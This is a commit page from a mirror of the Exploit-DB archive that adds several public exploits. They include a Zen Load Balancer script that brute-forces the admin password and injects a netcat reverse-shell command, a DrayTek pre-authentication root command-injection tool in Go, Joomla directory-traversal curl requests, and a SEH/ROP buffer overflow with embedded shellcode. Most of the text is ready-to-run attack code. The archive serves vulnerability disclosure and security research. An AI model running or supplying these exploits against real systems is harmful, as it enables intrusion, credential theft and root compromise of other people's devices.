bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-03-31

Browse source 
6 changes to exploits/shellcodes

Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation

Multiple DrayTek Products - Pre-authentication Remote Root Code Execution

ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)
Joomla! com_fabrik 3.9.11 - Directory Traversal
Zen Load Balancer 3.10.1 - Remote Code Execution
This commit is contained in:
Offensive Security 2020-03-31 05:01:48 +00:00
parent a55e8fc33d
commit 169b528eaa
7 changed files with 457 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

110
exploits/cgi/webapps/48266.py Executable file
View file

@ -0,0 +1,110 @@
# Exploit Title: Zen Load Balancer 3.10.1 - Remote Code Execution
# Google Dork: no
# Date: 2020-03-28
# Exploit Author: Cody Sixteen
# Vendor Homepage: https://code610.blogspot.com
# Software Link: https://sourceforge.net/projects/zenloadbalancer/files/Distro/zenloadbalancer-distro_3.10.1.iso/download
# Version: 3.10.1
# Tested on: Linux
# CVE : CVE-2019-7301
#c@kali:~/src/eonila/zenload3r$ cat zenload3r.py
#!/usr/bin/env python
# zenload3r.py - zen load balancer pwn3r
# 28.03.2020 @ 22:41
#
# by cody sixteen
#
import base64
import sys, re
import requests
import ssl
from functools import partial
ssl.wrap_socket = partial(ssl.wrap_socket, ssl_version=ssl.PROTOCOL_TLSv1)
# disable ssl warnings:
import urllib3
urllib3.disable_warnings()
from requests.auth import HTTPBasicAuth
#
target = sys.argv[1]
username = 'admin'
password = 'P@ssw0rd'
def main():
print 'zenload3r.py - zen load balancer pwn3r'
print ' zenload3r.py - vs - %s' % ( target )
print ''
print '[+] checking if host is alive...'
global sess
sess = requests.session()
global baseUrl
baseUrl = target + ':444/index.cgi'
checkBaseUrl = sess.get(baseUrl, verify=False)
checkBaseResp = checkBaseUrl.status_code
#print checkBaseResp
if checkBaseResp == 401:
print '[i] ...it is. we need to log in to proceed'
logmein(baseUrl)
def logmein(target):
print '[+] trying %s and default password "%s" vs %s' % (username, password, baseUrl)
#pwd_file = '/usr/share/wordlists/dirb/common.txt'
pwd_file = 'passwd.lst'
try:
read_pwds = open(pwd_file, 'r')
pwds = read_pwds.readlines()
for pwd in pwds:
pwd = pwd.rstrip()
logme = sess.post(baseUrl, auth=HTTPBasicAuth(username,pwd), allow_redirects=True)
logmeresp = logme.text
#print logmeresp
if '<p>Hello <strong>admin</strong>' in logmeresp:
print '[+] admin user logged-in! :D'
print '[+] working password: %s' % ( pwd )
load3r(baseUrl, pwd)
except requests.exceptions.ConnectionError:
print '[-] Can not connect to remote host :C\n'
def load3r(baseUrl, pwd):
print '[+] time to get reverse shell, preparing...'
creds = base64.b64encode("{}:{}".format(username,pwd))
creds2 = creds.rstrip()
print 'creds: ', creds2
baseUrl = "https://192.168.1.200:444/index.cgi"
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "pl,en-US;q=0.7,en;q=0.3", "Accept-Encoding": "gzip, deflate",
"Content-Type": "application/x-www-form-urlencoded", "Origin": "https://192.168.1.200:444",
"Authorization": "Basic {}".format(creds2), "Connection": "close",
"Referer": "https://192.168.1.200:444/index.cgi?id=1-3&action=Show_Form", "Upgrade-Insecure-Requests": "1"
}
sh = "a\";nc 192.168.1.170 4444 -e /bin/sh;#"
reqdata = {"cert_name": "qweqweqwe", "cert_issuer": "Sofintel",
"cert_fqdn": "qweqweqwe", "cert_division": "qweqweqwe",
"cert_organization": sh,
"cert_locality": "qweqweqwe", "cert_state": "qweqweqwe",
"cert_country": "qw", "cert_mail": "qweqweqwe@qweqweqwe.com",
"cert_key": "2048", "id": "1-3", "actionpost": "Generate CSR", "button": "Generate CSR"}
requests.post(baseUrl, headers=headers, data=reqdata,verify=False)
print '[*] got r00t? ;>\n'
# run me:
if __name__ == '__main__':
main()

87
exploits/linux/remote/48268.go Executable file
View file

@ -0,0 +1,87 @@
package main
/*
CVE-2020-8515: DrayTek pre-auth remote root RCE
Mon Mar 30 2020 - 0xsha.io
Affected:
DrayTek Vigor2960 1.3.1_Beta, Vigor3900 1.4.4_Beta,
and Vigor300B 1.3.3_Beta, 1.4.2.1_Beta,
and 1.4.4_Beta
You should upgrade as soon as possible to 1.5.1 firmware or later
This issue has been fixed in Vigor3900/2960/300B v1.5.1.
read more :
https://www.skullarmy.net/2020/01/draytek-unauthenticated-rce-in-draytek.html
https://www.draytek.com/about/security-advisory/vigor3900-/-vigor2960-/-vigor300b-router-web-management-page-vulnerability-(cve-2020-8515)/
https://thehackernews.com/2020/03/draytek-network-hacking.html
https://blog.netlab.360.com/two-zero-days-are-targeting-draytek-broadband-cpe-devices-en/
exploiting using keyPath
POST /cgi-bin/mainfunction.cgi HTTP/1.1
Host: 1.2.3.4
Content-Length: 89
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
*/
import (
"fmt"
"io/ioutil"
"net/http"
"net/url"
"os"
"strings"
)
func usage() {
fmt.Println("CVE-2020-8515 exploit by @0xsha ")
fmt.Println("Usage : " + os.Args[0] + " URL " + "command" )
fmt.Println("E.G : " + os.Args[0] + " http://1.2.3.4 " + "\"uname -a\"" )
}
func main() {
if len(os.Args) < 3 {
usage()
os.Exit(-1)
}
targetUrl := os.Args[1]
//cmd := "cat /etc/passwd"
cmd := os.Args[2]
// payload preparation
vulnerableFile := "/cgi-bin/mainfunction.cgi"
// specially crafted CMD
// action=login&keyPath=%27%0A%2fbin%2fcat${IFS}%2fetc%2fpasswd%0A%27&loginUser=a&loginPwd=a
payload :=`'
/bin/sh -c 'CMD'
'`
payload = strings.ReplaceAll(payload,"CMD", cmd)
bypass := strings.ReplaceAll(payload," ", "${IFS}")
//PostForm call url encoder internally
resp, err := http.PostForm(targetUrl+vulnerableFile ,
url.Values{"action": {"login"}, "keyPath": {bypass} , "loginUser": {"a"}, "loginPwd": {"a"} })
if err != nil{
fmt.Println("error connecting host")
os.Exit(-1)
}
defer resp.Body.Close()
body, err := ioutil.ReadAll(resp.Body)
if err != nil{
fmt.Println("error reading data")
os.Exit(-1)
}
fmt.Println(string(body))
}

65
exploits/php/webapps/48263.txt Normal file
View file

@ -0,0 +1,65 @@
# Exploit Title: Joomla! com_fabrik 3.9.11 - Directory Traversal
#Google Dork: inurl:"index.php?option=com_fabrik"
#Date: 2020-03-30
#Exploit Author: qw3rTyTy
#Vendor Homepage: https://fabrikar.com/
#Software Link: https://fabrikar.com/downloads
#Version: 3.9
#Tested on: Debian/Nginx/Joomla! 3.9.11
##################################################################
#Vulnerability details
##################################################################
File: fabrik_element/image/image.php
Func: onAjax_files
394 public function onAjax_files()
395 {
396 $this->loadMeForAjax();
397 $folder = $this->app->input->get('folder', '', 'string'); //!!!Possible to directory-traversal.
398
399 if (!strstr($folder, JPATH_SITE))
400 {
401 $folder = JPATH_SITE . '/' . $folder;
402 }
403
404 $pathA = JPath::clean($folder);
405 $folder = array();
406 $files = array();
407 $images = array();
408 FabrikWorker::readImages($pathA, "/", $folders, $images, $this->ignoreFolders);
409
410 if (!array_key_exists('/', $images))
411 {
412 $images['/'] = array();
413 }
414
415 echo json_encode($images['/']);
416 }
##################################################################
#PoC
##################################################################
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../tmp/"
...snip...
[{"value":"eila.jpg","text":"eila.jpg","disable":false},{"value":"eilanya.jpg","text":"eilanya.jpg","disable":false},{"value":"topsecret.png","text":"topsecret.png","disable":false}]
...snip...
$> curl -X GET -i "http://127.0.0.1/joomla/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../home/user123/Pictures/"
...snip...
[{"value":"Revision2017_Banner.jpg","text":"Revision2017_Banner.jpg","disable":false},{"value":"Screenshot from 2019-02-23 22-43-54.png","text":"Screenshot from 2019-02-23 22-43-54.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-22.png","text":"Screenshot from 2019-03-09 14-59-22.png","disable":false},{"value":"Screenshot from 2019-03-09 14-59-25.png","text":"Screenshot from 2019-03-09 14-59-25.png","disable":false},{"value":"Screenshot from 2019-03-16 23-17-05.png","text":"Screenshot from 2019-03-16 23-17-05.png","disable":false},{"value":"Screenshot from 2019-03-18 07-30-41.png","text":"Screenshot from 2019-03-18 07-30-41.png","disable":false},{"value":"Screenshot from 2019-03-18 08-23-45.png","text":"Screenshot from 2019-03-18 08-23-45.png","disable":false},{"value":"Screenshot from 2019-04-08 00-09-36.png","text":"Screenshot from 2019-04-08 00-09-36.png","disable":false},{"value":"Screenshot from 2019-04-08 10-34-23.png","text":"Screenshot from 2019-04-08 10-34-23.png","disable":false},{"value":"Screenshot from 2019-04-13 08-23-48.png","text":"Screenshot from 2019-04-13 08-23-48.png","disable":false},{"value":"Screenshot from 2019-05-24 23-14-05.png","text":"Screenshot from 2019-05-24 23-14-05.png","disable":false},{"value":"b.jpg","text":"b.jpg","disable":false},{"value":"by_gh0uli.tumblr.com-8755.png.jpeg","text":"by_gh0uli.tumblr.com-8755.png.jpeg","disable":false},{"value":"max_payne_06.jpg","text":"max_payne_06.jpg","disable":false},{"value":"xxx.jpg","text":"xxx.jpg","disable":false}]
...snip...
##################################################################
#Q&D Patch (DO NOT USE :3)
##################################################################
--- ./image.php ---
+++ image_patched.php ---
@@ -394,7 +394,7 @@
public function onAjax_files()
{
$this->loadMeForAjax();
- $folder = $this->app->input->get('folder', '', 'string');
+ $folder = $this->app->input->get('folder', '', 'cmd');
if (!strstr($folder, JPATH_SITE))
{

25
exploits/windows/dos/48262.py Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)
# Discovery by: Ivan Marmolejo
# Discovery Date: 2020-03-27
# Vendor Homepage: https://odin-secure-ftp-expert.jaleco.com/
# Software Link Download : http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
# Version : Odin Secure FTP Expert 7.6.3
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows 10 Home Single Lenguage (ESP)
Steps to Produce the Crash:
1.- Run python code: OdinSecureFTP.py
2.- Copy content to clipboard
3.- Open "OdinSecureFTPExpert.exe"
4.- Go to "Trial" > Connect > Quickconnect site
5.- Paste ClipBoard into the all fields
6.- Go to Connect
7.- Crashed
Python "OdinSecureFTP" Code:
buffer = "\x41" * 108
f = open ("OdinSecureFTP.txt", "w")
f.write(buffer)
f.close()

141
exploits/windows/local/48264.py Executable file
View file

@ -0,0 +1,141 @@
# Exploit Title: 10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)
# Date: 2020-03-30
# Exploit Author: Hodorsec
# Version: 9.03
# Software Link: https://www.10-strike.com/networkinventoryexplorer/network-inventory-setup.exe
# Vendor Homepage: https://www.10-strike.com
# Tested on: Win8.1 x64 - Build 9600
# Description:
# - Exploits the functionality to load a list of computers from a file
# - Some DLL's and the main EXE don't rebase, which allowed for some instruction reusage for ROP
# - Used a jump after ROP to go to a buffer for more space
# Reproduction:
# - Run the script, a TXT file will be generated
# - Open the program and click on tab "Computers"
# - Click the button "From Text File" and select the generated TXT file
# - Clck OK and check results
# WinDBG initial crash output:
# (f54.f48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# *** ERROR: Module load completed but symbols could not be loaded for C:\Program Files (x86)\10-Strike Network Inventory Explorer\NetworkInventoryExplorer.exe
# eax=000013d3 ebx=0018f778 ecx=000002e4 edx=0018f7c0 esi=08fd8d8c edi=00190000
# eip=00402b47 esp=0018f6e4 ebp=0018f73c iopl=0 nv up ei pl nz na po cy
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210203
# NetworkInventoryExplorer+0x2b47:
# 00402b47 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
# 0:000> g
# (f54.f48): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=0018f700 ebx=00420244 ecx=00000002 edx=08fd854c esi=0048b11c edi=08f4f388
# eip=41414141 esp=0018f8dc ebp=41414141 iopl=0 nv up ei pl nz na po nc
# cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
# 41414141 ?? ???
#!/usr/bin/python
import sys, struct
filename = "poc_10_strike_nie.txt"
# Maximum length
maxlen = 5000
# Offsets
crash_esi = 2145 # Initial space until ESI buffer filling
crash_seh = 217 # SEH
crash_nseh = crash_seh - 4 # NSEH
landingpad = 310 # Space for RET NOP landingpad after stackpivoting
# Shellcode
# msfvenom -p windows/exec cmd=calc.exe -v shellcode -f python -b "\x0a\x0d\x00\x5c\x3a" exitfunc=thread
# Payload size: 220 bytes
shellcode = b""
shellcode += b"\xda\xdb\xd9\x74\x24\xf4\x5f\x2b\xc9\xbd\x06"
shellcode += b"\xa7\x5d\x4b\xb1\x31\x83\xef\xfc\x31\x6f\x14"
shellcode += b"\x03\x6f\x12\x45\xa8\xb7\xf2\x0b\x53\x48\x02"
shellcode += b"\x6c\xdd\xad\x33\xac\xb9\xa6\x63\x1c\xc9\xeb"
shellcode += b"\x8f\xd7\x9f\x1f\x04\x95\x37\x2f\xad\x10\x6e"
shellcode += b"\x1e\x2e\x08\x52\x01\xac\x53\x87\xe1\x8d\x9b"
shellcode += b"\xda\xe0\xca\xc6\x17\xb0\x83\x8d\x8a\x25\xa0"
shellcode += b"\xd8\x16\xcd\xfa\xcd\x1e\x32\x4a\xef\x0f\xe5"
shellcode += b"\xc1\xb6\x8f\x07\x06\xc3\x99\x1f\x4b\xee\x50"
shellcode += b"\xab\xbf\x84\x62\x7d\x8e\x65\xc8\x40\x3f\x94"
shellcode += b"\x10\x84\x87\x47\x67\xfc\xf4\xfa\x70\x3b\x87"
shellcode += b"\x20\xf4\xd8\x2f\xa2\xae\x04\xce\x67\x28\xce"
shellcode += b"\xdc\xcc\x3e\x88\xc0\xd3\x93\xa2\xfc\x58\x12"
shellcode += b"\x65\x75\x1a\x31\xa1\xde\xf8\x58\xf0\xba\xaf"
shellcode += b"\x65\xe2\x65\x0f\xc0\x68\x8b\x44\x79\x33\xc1"
shellcode += b"\x9b\x0f\x49\xa7\x9c\x0f\x52\x97\xf4\x3e\xd9"
shellcode += b"\x78\x82\xbe\x08\x3d\x6c\x5d\x99\x4b\x05\xf8"
shellcode += b"\x48\xf6\x48\xfb\xa6\x34\x75\x78\x43\xc4\x82"
shellcode += b"\x60\x26\xc1\xcf\x26\xda\xbb\x40\xc3\xdc\x68"
shellcode += b"\x60\xc6\xbe\xef\xf2\x8a\x6e\x8a\x72\x28\x6f"
# ROP chain
def create_rop_chain():
# rop chain generated with mona.py - www.corelan.be
rop_gadgets = [
0x7c344efe, # POP EDX # RETN [MSVCR71.dll]
0x61e9b30c, # ptr to &VirtualProtect() [IAT sqlite3.dll]
0x010283e5, # MOV EAX,DWORD PTR DS:[EDX] # RETN [NetworkInventoryExplorer.exe]
0x010296a1, # XCHG EAX,ESI # ADD AL,BYTE PTR DS:[ECX] # RETN [NetworkInventoryExplorer.exe]
0x61e7555f, # POP EBP # RETN [sqlite3.dll]
0x61e63eaf, # & push esp # ret 0x04 [sqlite3.dll]
0x7c37678f, # POP EAX # RETN [MSVCR71.dll]
0xfffffdff, # Value to negate, will become 0x00000201
0x7c34d749, # NEG EAX # RETN [MSVCR71.dll]
0x0102a8a0, # POP EBX # RETN [NetworkInventoryExplorer.exe]
0xffffffff, #
0x61e0579d, # INC EBX # RETN [sqlite3.dll]
0x0102104a, # ADD EBX,EAX # RETN [NetworkInventoryExplorer.exe]
0x7c3458e6, # POP EDX # RETN [MSVCR71.dll]
0xffffffc0, # Value to negate, will become 0x00000040
0x7c351eb1, # NEG EDX # RETN [MSVCR71.dll]
0x7c369c4a, # POP ECX # RETN [MSVCR71.dll]
0x7c38dfd7, # &Writable location [MSVCR71.dll]
0x7c34a40e, # POP EDI # RETN [MSVCR71.dll]
0x0101da30, # RETN (ROP NOP) [NetworkInventoryExplorer.exe]
0x01014218, # POP EAX # RETN [NetworkInventoryExplorer.exe]
0x90909090, # nop
0x01014244, # PUSHAD # RETN [NetworkInventoryExplorer.exe]
]
return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
# NOPPING
retnop = struct.pack("<L", 0x61e0103e) # RET # sqlite3.dll
prenop = "\x90" * 200 # Pre NOP's after jumping back in stack, sledding until shellcode
postnop = "\x90" * 16 # Post NOP's after running ROP chain to disable DEP
# Jump back on stack for payload space
jmpback = "\xe9\x9f\xf9\xff\xff" # jmp 0xfffff9a4 # Jump back on stack for more space
# Prefix
prefix = "A" * crash_nseh # Junk until NSEH
nseh = "B" * 4 # Junk again, no use for NSEH
seh = struct.pack("<L", 0x0101ce0b) # ADD ESP,0BDC # RETN 0x0C ** [NetworkInventoryExplorer.exe] ** # Stackpivot
suffix = prenop # Prenopping until shellcode
suffix += shellcode # Magic!
suffix += retnop * landingpad # RET NOP as a landingpad after stackpivot, still having DEP enabled
suffix += rop_chain # Disable DEP
suffix += postnop # Old school NOP-sledding
suffix += jmpback # Jump! Just like van Halen
suffix += "C" * (maxlen - len(prefix + nseh + seh + suffix)) # Junk for filling
# Concatenate string for payload
payload = prefix + nseh + seh + suffix # Put it all together
try:
file = open(filename,"wb")
file.write(payload)
file.close()
print "[+] File " + filename + " with size " + str(len(payload)) + " created successfully"
except:
print "[!] Error creating file!"
sys.exit(0)

22
exploits/windows/local/48267.txt Normal file
View file

@ -0,0 +1,22 @@
# CVE-2020-0796
Windows SMBv3 LPE Exploit
![exploit](https://user-images.githubusercontent.com/1675387/77913732-110d4f80-7295-11ea-9af6-f17201c66673.gif)
## Authors
* Daniel García Gutiérrez ([@danigargu](https://twitter.com/danigargu))
* Manuel Blanco Parajón ([@dialluvioso_](https://twitter.com/dialluvioso_))
## References
* https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0796
* https://www.synacktiv.com/posts/exploit/im-smbghost-daba-dee-daba-da.html
* https://www.fortinet.com/blog/threat-research/cve-2020-0796-memory-corruption-vulnerability-in-windows-10-smb-server.html#.Xndfn0lv150.twitter
* https://www.mcafee.com/blogs/other-blogs/mcafee-labs/smbghost-analysis-of-cve-2020-0796/
* http://blogs.360.cn/post/CVE-2020-0796.html
* https://blog.zecops.com/vulnerabilities/vulnerability-reproduction-cve-2020-0796-poc/
Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48267.zip

8
files_exploits.csv
View file

@ -4781,6 +4781,7 @@ id,file,description,date,author,type,platform,port
38348,exploits/windows/dos/38348.txt,"Adobe Flash - 'uint' Capacity Field",2015-09-28,"Google Security Research",dos,windows,
38364,exploits/multiple/dos/38364.txt,"Varnish Cache - Multiple Denial of Service Vulnerabilities",2013-03-05,tytusromekiatomek,dos,multiple,
38365,exploits/linux/dos/38365.txt,"Squid - 'httpMakeVaryMark()' Remote Denial of Service",2013-03-05,tytusromekiatomek,dos,linux,
48262,exploits/windows/dos/48262.py,"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)",2020-03-30,"Ivan Marmolejo",dos,windows,
38392,exploits/linux/dos/38392.txt,"MySQL / MariaDB - Geometry Query Denial of Service",2013-03-07,"Alyssa Milburn",dos,linux,
38399,exploits/windows/dos/38399.py,"LanSpy 2.0.0.155 - Buffer Overflow (PoC)",2015-10-05,hyp3rlinx,dos,windows,
38404,exploits/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow (PoC)",2015-10-06,hyp3rlinx,dos,windows,
@ -11003,6 +11004,8 @@ id,file,description,date,author,type,platform,port
48251,exploits/windows/local/48251.txt,"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path",2020-03-25,"Felipe Winsnes",local,windows,
48253,exploits/windows/local/48253.py,"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)",2020-03-25,"Felipe Winsnes",local,windows,
48257,exploits/windows/local/48257.py,"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)",2020-03-27,"Felipe Winsnes",local,windows,
48264,exploits/windows/local/48264.py,"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)",2020-03-30,Hodorsec,local,windows,
48267,exploits/windows/local/48267.txt,"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation",2020-03-30,"Daniel García Gutiérrez",local,windows,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -18061,6 +18064,7 @@ id,file,description,date,author,type,platform,port
48228,exploits/hardware/remote/48228.txt,"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)",2020-03-18,FarazPajohan,remote,hardware,
48233,exploits/multiple/remote/48233.py,"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure",2020-03-18,"Maurizio S",remote,multiple,
48239,exploits/multiple/remote/48239.txt,"CyberArk PSMP 10.9.1 - Policy Restriction Bypass",2020-03-23,"LAHBAL Said",remote,multiple,
48268,exploits/linux/remote/48268.go,"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution",2020-03-30,0xsha,remote,linux,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -42505,6 +42509,8 @@ id,file,description,date,author,type,platform,port
48250,exploits/php/webapps/48250.txt,"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting",2020-03-25,SunCSR,webapps,php,
48255,exploits/hardware/webapps/48255.py,"TP-Link Archer C50 3 - Denial of Service (PoC)",2020-03-26,thewhiteh4t,webapps,hardware,
48256,exploits/php/webapps/48256.py,"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution",2020-03-26,"Engin Demirbilek",webapps,php,
48258,exploits/php/webapps/48258.txt,"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)",2020-03-27,"Alperen Soydan",webapps,php,
48258,exploits/php/webapps/48258.txt,"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)",2020-03-27,"Mustafa Emre Gül",webapps,php,
48260,exploits/java/webapps/48260.py,"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal",2020-03-27,hongphukt,webapps,java,
48261,exploits/php/webapps/48261.py,"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution",2020-03-27,vikingfr,webapps,php,
48263,exploits/php/webapps/48263.txt,"Joomla! com_fabrik 3.9.11 - Directory Traversal",2020-03-30,qw3rTyTy,webapps,php,
48266,exploits/cgi/webapps/48266.py,"Zen Load Balancer 3.10.1 - Remote Code Execution",2020-03-30,"Cody Sixteen",webapps,cgi,

Can't render this file because it is too large.